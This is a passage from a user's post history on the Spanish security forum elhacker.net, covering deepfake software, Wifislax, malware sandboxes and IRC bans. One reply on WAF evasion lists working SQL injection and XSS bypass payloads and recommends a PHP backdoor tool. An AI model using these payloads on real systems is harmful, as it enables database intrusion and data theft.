elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 476
1  Informática / Software / Re: Donde descargar Deepfacelab? en: Ayer a las 18:58
Citar
Buenas, he seguido el hilo de respuestas y después de descargar de la pagina de iperov no encuentro como instalar el programa , busco un .exe para poder ejecutarlo pero igual no va así , ¿como lo instalasteis? donde puedo encontrar info en español?

Es un repositorio de github del usuario iperov

https://github.com/iperov/DeepFaceLab

Donde pone
Releases
tienes el ".exe" para Windows
Windows (magnet link)    Last release. Use torrent client to download.
https://tinyurl.com/y8lntghz
Windows (Mega.nz)    Contains new and prev releases.
https://mega.nz/folder/Po0nGQrA#dbbttiNWojCt8jzD4xYaPw

En Links tienes guías y tutoriales en inglés. En Español poca información debe haber.

Como ya dije no es un software precisamente fácil de usar..... y no refería a la potencia del ordenador o de la gráfica.

En el último deepfake que he visto en la TV (un anuncio de TV en España) pues explican como lo han hecho:

https://www.xataka.com/robotica-e-ia/hablan-creadores-deepfake-lola-flores-pese-a-usar-inteligencia-artificial-fue-proceso-bastante-artesanal



Si, han usado FaceSwap, y DeepFaceLab

Pero si lo lees, verás que para que quede bien se necesitan muchas horas de trabajo.... y muchas márgenes.
2  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Avatar en: Ayer a las 18:53
opino lo mismo que #!drvy

Los Tercios de Aguilar "no suenan al franquismo" (.......), pero siendo de la Falange, pues de ideología "fascista", un rato largo....

No te preocupes #!drvy , siempre que veo las elecciones las papeletas de la Falange Española en Barcelona, están hasta arriba, no deben tener muchos votos.
3  Seguridad Informática / Análisis y Diseño de Malware / Re: quiero aprender a infectar un dispositovo, soy nuevo. en: Ayer a las 17:15
Abre tu propio post solicitando lo que necesitas...

 :rolleyes: :o :rolleyes:



No, mejor no. O será borrado.

Después de revivir un mensaje de 2019...... y hacer ése tipo de pregunta, tiene todos los números de acabar en la papelera.
4  Seguridad Informática / Análisis y Diseño de Malware / Re: Ayuda para mejorar el Buster Sandbox Analyzer en: 21 Enero 2021, 21:12 pm
pues no me dedico a analizar muestras de malware, pero si conozco algunas de las herramientas que existen (que no son precisamente pocas).

La verdad es que en los últimos años han aparecido un montón de servicios online muy, muy completos.



Lo que yo haría es tomar ideas de otros servicios y proyectos (siempre que sea factible, claro está).

Recopilación herramientas y servicios on-line:
https://blog.elhacker.net/2015/06/servicios-automatizados-de-analisis-de-malware-online-cloud-nube.html

 (Cloud Malware Analysis Services)

    Anubis : http://anubis.iseclab.org

    Any Run : https://any.run

    Malwr : Basado en Cuckoo Sandbox https://malwr.com/submission
 
    Threat Expert : http://www.threatexpert.com/submit.aspx

    Camas Comodo: http://camas.comodo.com/

    Threat Track : http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx

    Vicheck : https://www.vicheck.ca

    VirusTotal: https://www.virustotal.com/

    VxStream: https://www.hybrid-analysis.com/
5  Seguridad Informática / Hacking Wireless / Disponible wifislax64-2.4-final para descargar en: 21 Enero 2021, 20:57 pm
Se sigue utilizando como base slackware64-14.2 , con todos sus parches de seguridad al día.
Esta iso es un punto de control para la versión estable , se han actualizado todos los paquetes base , como firmwares , kernel … navegador etc.

Como kernel sale con linux-5.4.91 LTS
Como navegador , trae el recien estrenado chrome 88 , que ademas de muchos parches de seguridad , han eliminado finalmente el soporte de flash player.



Seguramente sera la ultima versión de wifislax con kde4 y slackware64-14.2

Changelog

Citar
20/01/2021
01 - Actualizado kernel 5.4.89 --> 5.4.91
02 - Actualizados firmwares de sistema
03 - Actualizado chrome-85.0.4183.121 --> 88.0.4324.96
04 - Actualizado bettercap-2.28 --> 2.29
05 - Actualizado airgeddon-10.31 --> 10.40

12/01/2021
01 - Actualizado kernel 5.4.88 --> 5.4.89
02 - Actualizado wpscan-3.8.12 --> 3.8.13
03 - Modificado hostapd-2.9 con mas opciones.

06/01/2021
01 - Actualizado kernel 5.4.87 --> 5.4.88
02 - Actualizados firmwares de sistema
03 - Mejorado wallpaper island por conca
     Se veían imperfecciones en la parte baja
     si usábamos un monitor grande.

Descarga
https://ns2.elhacker.net/isos/wifislax64-2.4-final.iso

Fuente:
https://foro.seguridadwireless.net/live-wifislax/wifislax64-2-4-final-para-descarga
6  Seguridad Informática / Análisis y Diseño de Malware / Re: programar un malware en: 21 Enero 2021, 20:36 pm
Lo que hay sobretodo son técnicas de ocultación, en este caso para hacerlo FUD (indetectable al antivirus), sea el lenguaje que sea.

Un ejemplo de RAT multiplataforma bastante curioso.

Arbitrium-RAT: troyano de acceso remoto multiplataforma (Windows-Android-Linux)
https://blog.elhacker.net/2021/01/arbitrium-rat-troyano-de-acceso-remoto-multiplataforma-windows-android..html
7  Comunicaciones / Chats; IRC y Messengers / Re: saltarse baneos en irc en: 21 Enero 2021, 20:32 pm
hoy en día con la cantidad de vpn's que hay disponibles es todavía más fácil saltarse un baneo. Seguro que hay bnc (bouncers)  y demás.

[D]aniel  te lo ha explicado muy bien, depende del formato del ban, si es por nick o ip

Citar
    0: *!user@host.domain
    1: *!*user@host.domain
    2: *!*@host.domain
    3: *!*user@*.domain
    4: *!*@*.domain
    5: nick!user@host.domain
    6: nick!*user@host.domain
    7: nick!*@host.domain
    8: nick!*user@*.domain
    9: nick!*@*.domain

¿Todavía se usa IRC? Pensaba que todos se mudaron a Discord  :laugh:
8  Foros Generales / Dudas Generales / Re: Google Forms en: 21 Enero 2021, 20:23 pm
Google Forms genera automáticamente si lo deseas un una hoja de cálculo tipo "excel" y también un reporte en HTML con gráficos en forma de quesitos. Puedes guardar esa página en HTML directamente desde el navegador, exportar en PDF.

También puedes exportar loa hoja de cálculo separada por ; , etc
9  Seguridad Informática / Nivel Web / Re: Evasión de WAF. en: 20 Enero 2021, 00:43 am
En github y medium he visto un montón de "trucos" técnicas y ejemplos para hacer un bypass de WAF. También hay varios bypass para el WAF de CloudFLare por ejemplo. Sería muy interesante primero averiguar el WAF que están utilizando. En las cabeceras de las peticiones web suelen añadir el WAF xD

Mejor manual que usar un "tamper". Puedes usar mayúsculas-minúsculas (dudo que funciona jaja) pero codificación URL + comentarios si

WAF Bypassing Strings usando comentarios, Url Encode (encoding)
Illegal mix of Collations ByPass Method

Código:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'


Aquí tienes ejemplos:

Citar
+union+select+1,2...+--+-
✖️
+/*!50000union*/+/*!50000select*/+1,2...+--+-
✖️

+/*!50000union%23%0Aselect*/+1,2...+--+-
✔️
+/*!50000uNiOn*/(/*!50000SeLeCt*/+11,22,33....)+--+-

Union select 1,2,3,4,...--
 /*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4... --


✔️

Código:
/*!50000%75%6e%69on*/ %73%65%6cect 1,2,3,4,5--

%75%6e%69on = union
%73%65%6cect = select

%75%6e%69 = uni = url encode
%73%65%6c = sel = url encode

Citar
1,group_concat(table_name) /*%%!asd%%%%*/from /*%%!asd%%%%*/information_schema.tables where table_schema=database(/*%%!asd%%%%*/) --+

Ejemplos:
https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md#sql-injection
https://medium.com/bugbountywriteup/exploiting-error-based-sql-injections-bypassing-restrictions-ed099623cd94
https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/

Lo mismo para evadir (bypass) de XSS

    1st Injection: */</script><!--
    2nd Injection: */.domain)/*xxx
    3rd Injection:*/(document/*xx
    4th Injection: */prompt/*xxxxx
    5th Injection: "><script>/*xss

https://twitter.com/XssPayloads



O sé imaginativo: Por ejemplo usa Bantam, Una herramienta de generación y administración de puerta trasera de PHP con transmisión de carga útil cifrada de extremo a extremo diseñada para evitar los sistemas WAF, IDS, SIEM

https://github.com/gellin/bantam

10  Informática / Hardware / Re: Combos chinos de hardware a precios ridículos en: 20 Enero 2021, 00:05 am
Con ojo a lo que compramos a los chinos.....en una pagina archiconocida compre hace muy poco un HDD de 2,5 de 1 Tb y lo que me han enviado es uno de ......300 Gb.

Y ahora reclama...jaja

Saludos.

Justo me ha recordado a esto:



Comprobar la capacidad real de espacio en un pendrive
https://blog.elhacker.net/2021/01/comprobar-la-capacidad-real-de-un-pendrive-detectar-si-es-falso.html
Páginas: [1] 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ... 476
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines